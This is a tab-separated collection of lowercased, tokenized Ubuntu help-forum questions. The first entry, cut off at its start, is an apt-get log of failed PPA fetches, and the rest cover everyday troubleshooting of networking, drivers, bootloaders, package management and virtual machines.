trusty release hit http : //security.ubuntu.com trusty-security/multiverse amd64 packages hit http : //us.archive.ubuntu.com trusty/multiverse i386 packages hit http : //security.ubuntu.com trusty-security/main i386 packages hit http : //ppa.launchpad.net trusty release hit http : //us.archive.ubuntu.com trusty/main translation-en hit http : //security.ubuntu.com trusty-security/restricted i386 packages hit http : //us.archive.ubuntu.com trusty/multiverse translation-en hit http : //ppa.launchpad.net trusty release hit http : //security.ubuntu.com trusty-security/universe i386 packages hit http : //us.archive.ubuntu.com trusty/restricted translation-en hit http : //ppa.launchpad.net trusty release hit http : //security.ubuntu.com trusty-security/multiverse i386 packages ign http : //extras.ubuntu.com trusty/main translation-en_us hit http : //us.archive.ubuntu.com trusty/universe translation-en hit http : //us.archive.ubuntu.com trusty-updates/main sources ign http : //extras.ubuntu.com trusty/main translation-en hit http : //us.archive.ubuntu.com trusty-updates/restricted sources hit http : //us.archive.ubuntu.com trusty-updates/universe sources hit http : //security.ubuntu.com trusty-security/main translation-en hit http : //us.archive.ubuntu.com trusty-updates/multiverse sources hit http : //us.archive.ubuntu.com trusty-updates/main amd64 packages hit http : //us.archive.ubuntu.com trusty-updates/restricted amd64 packages hit http : //us.archive.ubuntu.com trusty-updates/universe amd64 packages hit http : //us.archive.ubuntu.com trusty-updates/multiverse amd64 packages hit http : //us.archive.ubuntu.com trusty-updates/main i386 packages hit http : //security.ubuntu.com trusty-security/multiverse translation-en hit http : //ppa.launchpad.net trusty/main amd64 packages hit http : //us.archive.ubuntu.com trusty-updates/restricted i386 packages hit http : //ppa.launchpad.net trusty/main i386 packages hit http : //us.archive.ubuntu.com trusty-updates/universe i386 packages hit http : //security.ubuntu.com trusty-security/restricted translation-en hit http : //us.archive.ubuntu.com trusty-updates/multiverse i386 packages hit http : //us.archive.ubuntu.com trusty-updates/main translation-en hit http : //security.ubuntu.com trusty-security/universe translation-en hit http : //us.archive.ubuntu.com trusty-updates/multiverse translation-en hit http : //us.archive.ubuntu.com trusty-updates/restricted translation-en hit http : //us.archive.ubuntu.com trusty-updates/universe translation-en hit http : //ppa.launchpad.net trusty/main amd64 packages hit http : //us.archive.ubuntu.com trusty-backports/main sources hit http : //us.archive.ubuntu.com trusty-backports/restricted sources hit http : //ppa.launchpad.net trusty/main i386 packages hit http : //us.archive.ubuntu.com trusty-backports/universe sources hit http : //us.archive.ubuntu.com trusty-backports/multiverse sources hit http : //us.archive.ubuntu.com trusty-backports/main amd64 packages hit http : //us.archive.ubuntu.com trusty-backports/restricted amd64 packages hit http : //us.archive.ubuntu.com trusty-backports/universe amd64 packages hit http : //ppa.launchpad.net trusty/main amd64 packages hit http : //us.archive.ubuntu.com trusty-backports/multiverse amd64 packages hit http : //us.archive.ubuntu.com trusty-backports/main i386 packages hit http : //us.archive.ubuntu.com trusty-backports/restricted i386 packages hit http : //ppa.launchpad.net trusty/main i386 packages hit http : //us.archive.ubuntu.com trusty-backports/universe i386 packages hit http : //us.archive.ubuntu.com trusty-backports/multiverse i386 packages hit http : //us.archive.ubuntu.com trusty-backports/main translation-en hit http : //us.archive.ubuntu.com trusty-backports/multiverse translation-en ign http : //security.ubuntu.com trusty-security/main translation-en_us hit http : //us.archive.ubuntu.com trusty-backports/restricted translation-en ign http : //security.ubuntu.com trusty-security/multiverse translation-en_us hit http : //us.archive.ubuntu.com trusty-backports/universe translation-en ign http : //security.ubuntu.com trusty-security/restricted translation-en_us ign http : //security.ubuntu.com trusty-security/universe translation-en_us ign http : //us.archive.ubuntu.com trusty/main translation-en_us ign http : //us.archive.ubuntu.com trusty/multiverse translation-en_us ign http : //us.archive.ubuntu.com trusty/restricted translation-en_us ign http : //us.archive.ubuntu.com trusty/universe translation-en_us ign http : //us.archive.ubuntu.com trusty-updates/main translation-en_us ign http : //us.archive.ubuntu.com trusty-updates/multiverse translation-en_us ign http : //us.archive.ubuntu.com trusty-updates/restricted translation-en_us ign http : //us.archive.ubuntu.com trusty-updates/universe translation-en_us ign http : //us.archive.ubuntu.com trusty-backports/main translation-en_us ign http : //us.archive.ubuntu.com trusty-backports/multiverse translation-en_us ign http : //us.archive.ubuntu.com trusty-backports/restricted translation-en_us ign http : //us.archive.ubuntu.com trusty-backports/universe translation-en_us err http : //ppa.launchpad.net trusty/main amd64 packages 404 not found err http : //ppa.launchpad.net trusty/main i386 packages 404 not found ign http : //ppa.launchpad.net trusty/main translation-en_us ign http : //ppa.launchpad.net trusty/main translation-en ign http : //ppa.launchpad.net trusty/main translation-en_us ign http : //ppa.launchpad.net trusty/main translation-en ign http : //ppa.launchpad.net trusty/main translation-en_us ign http : //ppa.launchpad.net trusty/main translation-en ign http : //ppa.launchpad.net trusty/main translation-en_us ign http : //ppa.launchpad.net trusty/main translation-en w : failed to fetch http : //ppa.launchpad.net/happy-neko/ps3mediaserver/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/happy-neko/ps3mediaserver/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . here is the failed part from terminal on my mom 's computer after running sonofentropy 's command . does this ppa need to be removed to and will it effect her ability to use the canon printer ? i ca n't remember if i added this ppa and ended up not needing it or if this is how i got the canon network printer working for them . w : failed to fetch http : //ppa.launchpad.net/michael-gruz/canon/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/michael-gruz/canon/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
475949	adding an existing user to an existing group is n't working with usermod -a -g	i 'm attempting to add myself to a group vboxshare such that my user can access a virtual box shared directory under /media . seems easy enough . a quick google search gives a good looking answers : http : //www.cyberciti.biz/faq/ubuntu-add-user-to-group/ ( username : allusers ) usermod -a -g vboxsf allusers ok , did it , but no bueno , what 'd i miss here ? groups have never been a fluently intuitive concept to me in linux . i do see vboxsf as a group in 2 of the 3 commands i presume to use to see what groups are assigned to me . allusers @ vbubuntu : /media $ ll total 16 drwxr-xr-x 4 root root 4096 may 21 14:03 ./ drwxr-xr-x 23 root root 4096 may 25 23:38 ../ drwxr-x -- -+ 2 root root 4096 may 20 20:21 allusers/ drwxrwx -- - 1 root vboxsf 4096 may 31 12:20 sf_tempshare/ allusers @ vbubuntu : /media $ cd sf_tempshare/ bash : cd : sf_tempshare/ : permission denied allusers @ vbubuntu : /media $ groups allusers adm cdrom sudo dip plugdev lpadmin sambashare allusers @ vbubuntu : /media $ groups allusers allusers : allusers adm cdrom sudo dip plugdev lpadmin sambashare vboxsf allusers @ vbubuntu : /media $ id allusers uid=1000 ( allusers ) gid=1000 ( allusers ) groups=1000 ( allusers ) ,4 ( adm ) ,24 ( cdrom ) ,27 ( sudo ) ,30 ( dip ) ,46 ( plugdev ) ,108 ( lpadmin ) ,124 ( sambashare ) ,999 ( vboxsf )
475954	proccessor is busy all the time	i do n't really remember when the laptop first started to experienced this problem but the problem is when i open my laptop , i do n't know how or why , it is like the laptop is starting to make a dozens of hard calculations . once i just opened it waited for minutes , without doing something , and it happened again , the laptop is getting warmer and warmer , and fans are starting to make it cooler . the only tip i can give you guys is i was using boinc once . but than i moved it to another computer and uninstalled boinc from my laptop . so maybe i could not uninstall it properly and it is still running somewhere in core or something ... thanks advance . i have : intel core 2 duo cpu t5450 1.66ghz x 2*** intel 965gm x86 mmx sse2*** 32 bit*** ubuntu 14.04* here is a random screenshot from system monitor : http : //i58.tinypic.com/sobuip.png
475955	windows/ubuntu dual boot , shared storage , switching from one hard drive to two	i have read this and plan on following those general guidelines in order to set up windows/kubuntu/storage partitions on one hard drive . my question is if later on i decide to buy a second hard drive for the `` storage '' partition would i be able to give back the space on the first hard drive to the windows and kubuntu partitions ?
475956	static ip assignment disappears after a short while	i 'm assigning static ip to my eth1 interface ( which is connected to my reouter as a nat that i 've defined ) , simply using the following command : sudo ifconfig eth1 192.168.47.1 netmask 255.255.255.0 up the problem is that after a while ( less than a minue ) , the network icon keeps searching , eth1 disconnects , and the eth1 wo n't show any ip . so it wo n't stay stable . each time i have to run the above command again and again to keep it running continously . does anybody know what the problem is , and how to make it stable ?
475957	ubuntu 14 painfully slow on dell r200	i did n't notice it at first . the machines ( there is 20 plus ) are to be used a simple file servers . it was n't until samba just would n't act right that i installed a desktop gui and started more diagnoseing the problem did i catch the slow preformance ... i 've tested 4 servers they all suck . and windows 7 runs fantastic on them . i have google and searched . but nothing to explain this . the easy test is dmesg is so slow you can almost read it . i 'm guessing it 's an apic or cpu power management issue . what output would you all like ? ? ? ? ? it is a core2 machine with 4gb of ram . on board data .
475962	dual booting windows 7/ubuntu and partitioning on a 220gb ssd / 1tb hdd	i am not a technical user and am not familiar with any of these linux/unix/ubuntu terms - i 'm looking for an easy to follow , non-technical guide for setting up my system - please tell it to me like i 'm a fifth grader . i currently have an asus g75vx equipped with a 250gb ssd and a 1tb hdd . my os right now is windows 7 , and i 'm looking to dual boot with ubuntu so that all of my important applications/files are located on the ssd and the more long-term storage files are located on the hdd .
475964	need some help with dwb and custom css	okay , so installed perdomainsettings using dwbem -i perdomainsettings and im trying to use a custom css for 4chan . so i have the css file but i cant seem to get the css to apply . inside my perdomainsettings i added the following lines to my config . hosts : { `` http : //boards.4chan.org/g/ '' : { `` userstylesheeturi '' : file : /home/nathan/css/g.css `` } , } , edit : the perdomiansettings was located in /usr/share/dwb/extensions/ and i chmod 777 it
475967	how create a .conf file in a openvpn for run automatically on system startup ?	i want run openvpn automatically on system startup . but how can i create a .conf file in my server for i after using scp in my client desktop ? what i have to put inside of this .conf file ? in a howto in openvpn nothing is write thanks !
475968	laptop 's speakers emit an annoying sound when battery is not charging	how i can disable the power saving off the speakers ? the speakers emit an annoying sound every 10 seconds and have read that it is due to turn on and off the speakers of the laptop to save power .
475970	something is wrong with my bash prompt ?	so when i type with my new bash prompt it goes on for a while , but if the command gets to long it loops around itself and writes over bash prompt . here is my ps1 : ps1='\e [ 0 ; 34m\a\e [ m | \e [ 0 ; 31m-\e [ m \e [ 0 ; 32m > > \e [ m ' for reference , here are the lines from a standard .bashrc relevant to ps1 : if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac
475972	error : could n't find rgb glx visual or fbconfig ubuntu 12.04	i 'm using intel hd graphics as graphics card and i 'm trying to open an opengl program , but , when i try to run it , i have the following error : opengl glx extension not supported by display ':0.0' then , i tried to run glxinfo , then i had the : error : could n't find rgb glx visual or fbconfig ubuntu 12.04 error . how can i fix this error from not happening again ?
475976	translating ubuntu itself	i have a question for which i do n't seem to be able to find the answer . where can i find the translations and the translation process of ubuntu ? i 'm currently in a revival project of the gothic language and if there is enough demand i could maybe , depending on the amount of text , try to translate a part of ubuntu in this language . as providing operating systems in this language might be a good step to reviving it .
475977	run qt designer/qt assistant with commands designer/assitant respectively	i 'm used to an environment where i run the qt designer/qt assistant simply typing designer/assitant in the terminal . i am talking about qt 4 . i 've been installing packages such as qtcreator and qt4-default , but i get this : ~ $ assistant assistant : could not exec '/usr/lib/x86_64-linux-gnu/qt4/bin/assistant ' : no such file or directory ~ $ designer designer : could not exec '/usr/lib/x86_64-linux-gnu/qt4/bin/designer ' : no such file or directory
475978	ifup -a only working if connected to the internet	background i have a gateway server that has been happily running 12.04 for over eighteen months . it has two interfaces , eth3 and wlan3 . suddenly ... eth3 has stopped coming up on boot . boot messages report : waiting for network configuration waiting for up to 60 more seconds for network configuration after boot ifconfig shows the lo and wlan3 interfaces . sudo ifup -a gives : lo : failed to bring up lo eth3 : failed to bring up eth3 if i manually set the address with sudo ifconfig eth3 192.168.10.201 then the interface comes up correctly . but wait ! there 's weirdness ! in trying to reproduce the issue for this question i tried sudo ifdown -a then sudo ifup -a again . it reported my ip address ( 121.45.nnn.nn , not 192.168.10.201 ) 3 times . if i turn my modem off and repeat sudo ifdown -a then sudo ifup -a again it gives : failed to bring up lo . failed to bring up eth3 . why does ifup -a require an internet connection to bring up a static local address ? here 's /etc/network/interfaces : # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth3 iface eth3 inet static address 192.168.10.201 netmask 255.255.255.0 broadcast 192.168.10.255 other info to avoid the xy problem wlan3 is also periodically losing and unable to regain connection . i 've cleaned the internals and reseated cards . motherboard is reporting 3vdd = 3.3v so i 'm ruling out a hardware issue for now . the issue did n't appear immediately after any update . i 've tried rolling back the kernel and the behaviour was the same . this is a server install of 12.04 running lxde . wicd is used to control wlan3 . network-manager is not installed . the interfaces are named eth3 and wlan3 due to a convoluted install process involving a usb drive . there are no other interfaces .
475980	whats the best music producing software ?	i am running ubuntu 14.04 and i am currently looking for a application that i can use to produce rap/hip-hop music . any suggestions ?
475983	how to output the english version of jockey-text ?	i found i can change version of almost instructions except jockey-text . for example : sam @ sam : ~/tmp2 $ ls sam @ sam : ~/tmp2 $ mkdir 家 sam @ sam : ~/tmp2 $ ls 家 sam @ sam : ~/tmp2 $ export lc_all=c sam @ sam : ~/tmp2 $ ls ? ? ? sam @ sam : ~/tmp2 $ jockey-text -l kmod : nvidia_304 - nvidia_304 ( 專有 , 已啟用 , 未使用 ) kmod : nvidia_304_updates - nvidia binary xorg driver , kernel module and vdpau library ( 專有 , 已停用 , 未使用 ) kmod : nvidia_331 - nvidia binary xorg driver , kernel module and vdpau library ( 自由 , 已停用 , 未使用 ) kmod : nvidia_331_updates - nvidia binary xorg driver , kernel module and vdpau library ( 專有 , 已停用 , 未使用 ) sam @ sam : ~/tmp2 $ how to change the language version of jockey-text ? thank you~
475987	a2dp on pulseaudio - terrible choppy/skipping audio	i have paired my bluetooth headset with my ubuntu 12.04 laptop with a bluetooth chip inside : lsusb | grep bluetooth bus 003 device 003 : id 045e:0745 microsoft corp. nano transceiver v1.0 for bluetooth the device has been paired , and with the help of blueman , i 've connected it to pulseaudio as a sink . audio does come across in a2dp mode , but is terribly choppy and skips to the point of being not much better than nothing . i read around and saw that there was a fix involving adjusting the nice priority of the pulseaudio server . since by default , pulseaudio runs on a per-user basis , i added the following to my /etc/security/limits.conf : * hard rtpio 0 * soft rtpio 0 @ audio hard rtpio 20 @ audio soft rtpio 20 pulse hard rtpio 20 pulse soft rtpio 20 i then added myself to the audio group to be able to schedule priority for the pulseaudio process . it seems that pulseaudio is now running with a priority of -11 : ps -eo pri , ni , cmd | grep [ p ] ulse 30 -11 /usr/bin/pulseaudio -- start -- log-target=syslog this should mean that pulseaudio is running with a priority of -11 , which is good . however , even after restarting , i still get the terrible choppy audio . how should i proceed ? i 'm trying to make this bluetooth headset i purchased usable . note : i 've tried pairing this device with an android tablet right next to my laptop and it works fine , so it 's not wireless congestion , it seems to be directly correlated to linux somehow .
475988	new to linux screen problems after login	i am new to linux just installed on compaq with a hard driver that is completely clean . after i installed and booted up every thing works till i login . when i login the screen goes blury where i cant see anything . the compaq model # sr5703wm and it has on board nvida driver .
475989	installing ghc 7.8.2 on ubuntu 13.04	first : yes , i really do mean to install install just ghc , and not the haskell platform . i am installing in a vm made just for this purpose , i have the platform installed elsewhere . so the standard instructions for installing from a distro mentions ghc6 which is not recognized as a valid target ( anymore ? ) . so if i install the ghc package instead , i ( successfully ) get 7.6.3 . i did make sure that i have universe enabled , and have the latest package list . is it that 7.8.2 is not packaged yet ?
475990	dhcp server on maas	i have disabled dhcp on my router in my dns and dhcp server is installed , configured the cluster , but my dhcp does not work and so i can not add nodes via pxe . i 'm using ubuntu cloud openstack 14.04 .
475992	ca n't control dual boot anymore	i never even see the bios stuff anymore . it boots to purple ubuntu login . i need to disable the ubuntu boot so i can get back into windows 7 . this dual boot has been working fine but now ubuntu has taken over .
475993	grub update warning in ubuntu 14.04	i tried to update grub so i run : sudo update-grub generating grub configuration file ... warning : setting grub_timeout to a non-zero value when grub_hidden_timeout is set is no longer supported . what exactly this warning wants to be changed ? ( i upgraded from 12.04 to 14.04 before ) this is my grub file : grub_default= '' 0 '' grub_hidden_timeout= '' 0 '' grub_hidden_timeout_quiet= '' true '' grub_timeout= '' 10 '' grub_distributor= '' `lsb_release -i -s 2 > /dev/null || echo debian` '' grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' ''
475995	how can i install ubuntu touch on my nook hd+ ? ( tutorial )	i 've looked at the links on the ubuntu website , and it 's confusing . it says : install ubuntu fs file , so i click the link , and there is like , 50 of em . can someone just tell me how ? like , ubuntu touch , for dummies .
475996	ubuntu 14.04 slow , high cpu usage	i experienced cpu strange behavior after installing ubuntu 14.04 , at 5 or 10 minutes , cpu usage suddenly increased about 50 % , that 's really slow my laptop down ( ubuntu 13.10 worked fine by the way ) here is my laptop specs : asus a43sa intel core i3-2330m 2.20 ghz 4 gb of ram i noticed this when the first installation , even after i disabled online and file search , even after i switch to gnome 3 , and even after i used gnome fallback session , how to solve this ?
475997	can i run compiz with specified profile from terminal ?	i am making a personal desktop environment and one of the programs i use is compiz . however , i need to execute all my components from a shell script , and every time i launch compiz it runs in its default mode . is there any way to run compiz from the terminal while telling it to use a ccsm profile ? thanks in advance .
475998	ubuntu on dell tablet laptop ?	i am interested in getting a used dell xt/xt2/xt3 . is any of the features on the tablet not compatible ? does the n-trig pen work without its proprietary driver ? thanks for any advice !
475999	how to remove the `` apple '' icon from the mac os x plymouth theme	i really like the mac os x theme for ubuntu but i do not like the apple sign which comes on the boot . how can i remove that ?
476001	how to get wifi working properly - i am noob	i 'm a noob to ubuntu , but not computers . i installed a full version of ubuntu version 12 whatever it is . i run it on a machine that has win7/win8 on another hard drive . my wireless adapter is some tiny usb stick i got on ebay - it works great in windows , but i ca n't get it to work in ubuntu . more precisely , ubuntu is providing me a list ( sometimes ) of wireless networks in the area and when i try to connect to mine it just keeps password prompting me even though the one i use is correct . i looked over all the settings multiple times and do n't believe there is anything in error regarding what it takes to connect to my network . so , i thought maybe it is a driver issue and came across ndis . i thought i should try installing it , but i do n't know how when i ca n't connect the ubuntu machine to the internet . i tried some commands to no avail . i have the ubuntu installation disc and it shows a ndis common and utils .deb files in there . can someone out there help me out to get this wireless setup so i can get online ? june 3 : i have tried using ndiswrapper , but it failed me ( the command sudo modprobe ndiswrapper fails ) . then i discovered that there is a linux driver for my device . after getting nowhere with ndiswrapper , i decided to uninstall it and i installed the linux driver . somewhere during this process , the wireless card worked and successfully connected to my network , but i could n't browse the internet . no webpages would load . after restarting the machine , now no networks are displayed . i still can not get this thing to work right in linux . june 4 : i am still trying to get it to work . i 'm using realtek 8188cu usb wireless adapter . the commands iwconfig and ifconfig no longer are listing wlan0 . june 5 i 'm getting a `` no device '' message . i tried so many different commands , read so many articles . still nothing works .
476004	software update center not starting / reading package list ... error !	my software update center does not open anymore . what happened before is the following : i tried to install eclipse via ubuntu software update center . i found it and confirmed the installation by authenticating . in the middle of installing it , the installation was interruppted and cancelled ( not by me ) . i tried to restart it but it would n't do that . i closed the ubuntu software update center and tried to reopen it again - > it does not open anymore . i can do sudo apt-get update but apt-get upgrade will give me : reading package lists ... error ! e : malformed description-md5 line ; includes invalid character '3919845529b0a33978c0b2561f298d7' e : malformed description-md5 line ; includes invalid character '5e041d513a337daed9f200208d901c0' e : the package lists or status file could not be parsed or opened .
476005	postgresql ubuntu 12.04 not starting	i installed postgresql on ubuntu 12.04 , using apt-get install postgresql everything worked fine . i made database , inserted data etc . then i rebooted my computer , and postgres did not start . there is nothing in /etc/postgresql . service postgresql start / stop /restart do nothing . pg_lsclusters displays nothing . what on earth has gone wrong ? how do i start postgresql ? where on earth are the database tables stored ?
476008	apt-get -f install removed software center and several other files	i ran sudo apt-get -f install and several files and programs were removed including software center . is there a way to re-download everything as if ubuntu was new again without a cd ? this computer does not have a cd-rom drive . i 'd be fine with losing all the data on this computer . also , when i run sudo apt-get install ( almost anything ) i get errors about dependencies and files not being available . thanks to anyone who can help .
476012	bootable usb only works on 1st computer	i 've created a usb hard drive ( external ) and installed 14.04 on it so when i plug it in to my laptop , it will boot . the problem is that now the ubuntu on my hard drive thinks that it is my laptop , so now i ca n't boot from the drive onto any computer except my laptop . my plan was to make it so i can boot it onto any computer . please help .
476015	nvidia 560 ti driver install ubuntu 14.04 leads to `` missing on display '' error	currently on my ubuntu 14.04 install , i boot it up install the latest updates and attempt to install the nvidia drivers from xorg-edgers while following the top answer on this post installing nvidia drivers it installs 304 for my card and when i check the `` glxinfo | grep opengl '' i have about 8 lines that read xlib : extension `` nv-glx '' missing on display `` :0 '' . i did the `` sudo apt-get install nvidia-current '' to get the latest . i install it but did n't see any errors in the terminal . i 'm not sure what i 'm doing wrong here . i 'm not a complete beginner with linux so i can find my way around just fine but i ca n't find a solution to this issue . should i have done one of these two instead ? sudo apt-get install nvidia-304 sudo apt-get install nvidia-graphics-drivers-304
476016	os keeping on same hard drive	is it possible to keep my windows 7 and linux os 's on the same hard drive ? and able to choose what to use os to use when i want ?
476017	drag and drop does not work in yahoo webmail mail	i 'm trying to attach files to a yahoo email ( web mail ) by dragging and dropping on ubuntu 14.04 with firefox . when i drag the file over the email it highlights ( turns green ) and displays a message to `` drag and drop attachment here '' , but when i release the file it does n't attach . has anyone figured out the drag and drop attachment issue ?
476020	unity session goes to lock on app launch , and wo n't unlock with password	has been happening on every ubuntu machine i 've used to date , which is a total of 4 . started in 12.10 as far as i know , but it might have happened with 12.04 , 12.10 , 13.04 , 13.10 and now 14.04 . it does n't seem to matter what i 'm doing , but what always seems to trigger it is opening a web browser or some other application first from the sidebar . firefox was was the most recent trigger . instead of opening my browser , which it acts like it 's going to do ... the session locks , goes to the login screen , and wo n't unlock with the correct password . by 'wo n't unlock ' i mean it unlocks then immediately locks again without first restoring unity , it does not produce 'incorrect password' i suspect this is a virus or password snooping software because of the fact it wo n't unlock with correct password information and i think if this is a security issue , it should be fixed asap considering it 's widespread throughout multiple versions . it 's probably not a virus , but it is certainly suspicious behaviour to see your pc do that ... would n't you think ?
476022	how to make my phpbb index the default `` index.html '' file with apache2 ?	i 'm basically a complete novice with linux and servers , but i do have my website up ... sort of . i need to know how to make my default page my phpbb forum . i believe you should be able to see my default apache page here at www.pnweuros.com , i want that address to take me to www.pnweuros.com/phpbb i 've searched for hours , but ca n't find a solution .
476023	how to run php with eclipse and xampp ?	i 'm using eclipse kepler on ubuntu 14.04 , and i want to know how do i run a php project ? i already installed the plugin in eclipse for php and when command run the project , the page does not load in the browser . i know this is why i have to save the php pages in the xampp directory : / opt / lampp / htdocs . my php files are in the eclipse workspace in my home folder , how can i run from the workspace if that is possible ?
476026	how to combine 2 vdi files ? one with ubuntu installed and other empty	i created a virtual machine in virtual box with ubuntu 14.04 as a guest . i assigned 10gb fixed storage as hard disk . now i feel that it is too less so i went to storage settings for the vm and made a new sata disk of 40gb . now i ca n't see that new disk space on my vm . please help..
476028	( 12.04 vm/server ) dist-upgrade to 3.2.0-63 wants to remove git ( 1.9.2 ) and git-core - is that the correct behavior ?	was wondering if anyone knows dist-upgrade wants to remove git . fwiw , this is a pretty simple box , mainly used for web dev . $ uname -a linux precise64 3.2.0-61-generic # 93-ubuntu smp fri may 2 21:31:50 utc 2014 x86_64 x86_64 x86_64 gnu/linux $ git -- version git version 1.9.2 $ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages will be removed : git git-core the following new packages will be installed : linux-headers-3.2.0-63 linux-headers-3.2.0-63-generic linux-image-3.2.0-63-generic the following packages will be upgraded : git-man linux-headers-server linux-image-server linux-server phpmyadmin 5 upgraded , 3 newly installed , 2 to remove and 0 not upgraded . need to get 58.8 mb of archives . after this operation , 199 mb of additional disk space will be used . do you want to continue [ y/n ] ? edit : including more information : $ apt-cache policy git git : installed : 2:1.9.2-0avh1~precise candidate : 2:2.0.0-0avh2~precise version table : 2:2.0.0-0avh2~precise 0 500 http : //ppa.launchpad.net/pdoes/ppa/ubuntu/ precise/main amd64 packages *** 2:1.9.2-0avh1~precise 0 100 /var/lib/dpkg/status 1:1.7.9.5-1 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages $ apt-cache policy git-core git-core : installed : 2:2.0.0-0avh2~precise candidate : 2:2.0.0-0avh2~precise version table : *** 2:2.0.0-0avh2~precise 0 500 http : //ppa.launchpad.net/pdoes/ppa/ubuntu/ precise/main amd64 packages 100 /var/lib/dpkg/status 1:1.7.9.5-1 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages $ apt-cache policy git-man git-man : installed : 2:1.9.2-0avh3~precise candidate : 2:2.0.0-0avh2~precise version table : 2:2.0.0-0avh2~precise 0 500 http : //ppa.launchpad.net/pdoes/ppa/ubuntu/ precise/main amd64 packages *** 2:1.9.2-0avh3~precise 0 100 /var/lib/dpkg/status 1:1.7.9.5-1 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages edit : purged git , git-core , and git-man , and attempted to re-install git ( note , this caused a bad situation for me , as i rely on both git and virtualenvwrapper ; so i 've reverted this machine back to previous/working state ) : $ sudo apt-get purge git git-core git-man reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : git* git-core* git-man* 0 upgraded , 0 newly installed , 3 to remove and 4 not upgraded . after this operation , 20.9 mb disk space will be freed . do you want to continue [ y/n ] ? y $ sudo apt-get install git reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libjs-underscore python-virtualenv wwwconfig-common libjs-jquery javascript-common libjs-sphinxdoc use 'apt-get autoremove ' to remove them . the following extra packages will be installed : git-man suggested packages : git-daemon-run git-daemon-sysvinit git-doc git-el git-email git-gui gitk gitweb git-arch git-cvs git-mediawiki git-svn the following packages will be removed : bash-completion virtualenvwrapper the following new packages will be installed : git git-man 0 upgraded , 2 newly installed , 2 to remove and 4 not upgraded . need to get 10.3 mb of archives . after this operation , 19.2 mb of additional disk space will be used . do you want to continue [ y/n ] ? n ===== final edit , regarding the solution from saiarcot895 : this vm came from a puphpet vagrant config , which indeed uses that ppa by pdoes for git ( that was n't something i had paid attention to up until now ) . to get things sorted out , i just removed that ppa from my system , and installed the version of git from the main repository : # apt-add-repository -- remove ppa : pdoes/ppa # apt-get update & & apt-get install git -y # apt-cache policy git git : installed : 1:1.7.9.5-1 candidate : 1:1.7.9.5-1 version table : *** 1:1.7.9.5-1 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages 100 /var/lib/dpkg/status obviously that 's an older version of git , but it 's still perfectly acceptable for my needs . and then after that , i was able to run apt-get dist-upgrade with no problems .
476030	how can i make vm to fully cover the screen in kvm ?	i installed debian wheezy in kvm using virtual machine manager . vm does n't fully cover the screen , with large gaps in both sides of screen as seen in pictures below . how can i make vm to fully cover the screen in both full screen and non full screen modes ? non full screen mode : full screen mode :
476031	sound distortion in ubuntu 14.04	i recently installed ubuntu 14.04 on my dell xps 15 ( l502x ) . previously i had ubuntu 12.04 installed on the laptop along with windows 8.1 dual boot . the sound worked perfectly fine in ubuntu 12.04 and is working fine in windows 8.1 . of late , i have been experiencing sound distortion coming from the subwoofer at moderately high volume levels . at the same level i am unable to reproduce the same effect in windows 8.1 . also , i did a clean install of ubuntu 14.04 over 12.04 . can anyone please confirm this and help me with this ? thanks
476034	how to enable an application to run at ubuntu start up which is installed using wine ?	i installed some applications using wine in my ubuntu 14.04 . i need some of that applications to run at system start up . one such application is networx ( an application to measure bandwidth usage ) . how can i do it ? update : i need to run the application in the user account too . is that possible ? if yes , how ? if no , why ?
476035	weird internet connection issue on ubuntu 14.04	i have an old gateway pc with windows 7 installed alongside the original ( xp , i think ? ) . a while ago my friend walked me through and helped me install ubuntu 14.04 alongside the others because my win7 was having issues with the display driver ( it would unexpectedly crash while trying to watch videos on youtube or other places ) . and i ca n't update it because the original computer settings are for xp or something , not win7 . : ( we recently switched from at & t u-verse to comcast . i would have stayed with ethernet , but somehow the adapter i have would n't connect to comcast 's thing during their installation . so i was given a wireless usb adapter . it worked fine , up until the last few days . it 's not a problem on win7 ( using it right now ) . connection 's strong , things load . on ubuntu though , it says it connects even before i login to my account , but when i login and bring up firefox , it will load the homepage , and maybe one or two other pages i venture to before suddenly just ... endlessly trying to load the page . i would normally go in and manually select 'disconnect ' from the connections options menu to refresh/restart it like i 've done a few times already . but lately , it wo n't respond , and then a little while later an error message comes up saying the request timed out/failed . restarting my computer does n't help it . the other weird thing is that i 've noticed the signal ( when it 's actually working properly before the last few days ) is comparitively weaker than when i 'm on win7 . but my location does n't change . it 's the same computer , same connection .
476036	xset : unable to open display	for the longest time after about 5 minutes my screen would blank out . now the screen will go blank after 5 minutes but then 2 seconds after that it will light up white and keep the laptop backlighting on . i didnt change any settings to my knowledge it just happened randomly after powering it on one day and has occurred since then . i wish to resort back to blanking the screen out completely since i leave this computer on all the time and its hard to sleep with a huge white light all the time . `` xset dpms force off '' just yeilds me -- -- xset : unable to open display `` ''
476037	how to mount encrypted home directory in an encrypted lvm with username/password	i mounted the lvm to ~/recover the private home folder is now here ~/recover/home/eshwar $ access-your-private-data.desktop i tried ecryptfs-recover-private but it appears that the login passphrase is wrong . i need to be able to login with my username and password .
